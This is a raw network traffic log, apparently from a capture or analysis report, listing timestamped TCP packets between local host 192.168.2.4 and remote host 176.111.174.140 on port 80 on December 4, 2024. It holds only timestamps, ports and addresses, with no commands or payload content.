                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.309016943 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.309784889 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.309910059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.310091972 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.310904980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.310935974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.311044931 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.312002897 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.312117100 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.312252045 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.313148975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.313366890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.313776970 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.314300060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.314448118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.314594984 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.315356970 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.315485954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.315603018 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.316597939 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.316716909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.316886902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.317579985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.317707062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.318166018 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.318697929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.318840981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.319086075 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.319814920 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.319937944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.320065022 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.320982933 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.321139097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.321655035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.322072983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.365988970 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.457756042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.457866907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.458025932 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.458439112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.458452940 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.458597898 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.459477901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.459681988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.460011959 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.460618973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.460839033 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.461875916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.461951971 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.462043047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.462636948 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.463076115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.463181973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.463258982 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.464258909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.464344025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.464560032 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.465297937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.465424061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.465545893 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.466159105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.466294050 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.466399908 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.467346907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.467735052 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.467868090 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.468466997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.468563080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.468661070 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.469552994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.469703913 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.469882011 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.470700979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.470793962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.470891953 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.471811056 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.471839905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.471942902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.473100901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.473244905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.473346949 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.473949909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.474123955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.474282026 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.475323915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.475693941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.475810051 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.476236105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.476391077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.476572037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.477416039 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.477586031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.477700949 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.478440046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.478545904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.478661060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.479600906 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.479695082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.479861021 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.480742931 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.480801105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.480900049 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.481801987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.481949091 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.482048035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.482999086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.483066082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.483159065 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.484060049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.484177113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.484277010 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.485251904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.485331059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.485491037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.486336946 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.486752033 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.486860037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.487483978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.487740040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.487848043 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.488497019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.488553047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.488688946 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.489638090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.489731073 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.489825964 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.490751982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.490854025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.490983009 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.491925001 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.492046118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.492558956 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.493007898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.493109941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.493237019 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.494153976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.494246006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.494543076 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.495368958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.495501995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.495764017 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.496474981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.496576071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.496730089 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.497486115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.497592926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.498158932 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.498624086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.498682976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.498812914 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.499738932 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.499851942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.500058889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.500838041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.501054049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.501228094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.501965046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.502098083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.502217054 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.503103971 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.503160000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.503431082 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.504348993 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.504436016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.504698038 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.505330086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.505475044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.505634069 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.506422043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.506515026 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.506683111 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.507561922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.507792950 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.508672953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.508744001 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.508770943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.509859085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.509926081 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.509958982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.510641098 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.510912895 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.511059999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.511148930 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.512026072 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.512243986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.512290955 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.513201952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.513374090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.513437986 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.514298916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.514446974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.514501095 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.515405893 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.515490055 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.516464949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.516539097 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.649895906 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.649908066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.650016069 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.650202036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.650362968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.650460958 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.651346922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.651436090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.651544094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.652440071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.652548075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.652736902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.653599024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.653698921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.653877020 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.654676914 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.654849052 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.655421019 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.655821085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.656055927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.656163931 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.656925917 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.657049894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.657172918 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.658061981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.658168077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.658333063 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.659156084 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.659280062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.659483910 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.660303116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.660429955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.660612106 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.661398888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.661539078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.661700010 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.662518024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.662616968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.662867069 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.663644075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.663763046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.663887024 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.664752007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.664944887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.665399075 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.665890932 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.666003942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.666117907 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.667066097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.667201042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.667449951 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.668119907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.668205023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.668484926 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.669234037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.669349909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.669517994 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.670325994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.670468092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.670686007 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.671458960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.671608925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.671816111 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.672614098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.672733068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.673903942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.674037933 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.674103022 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.674859047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.674947023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:35.674994946 CET4973880192.168.2.4176.111.174.140
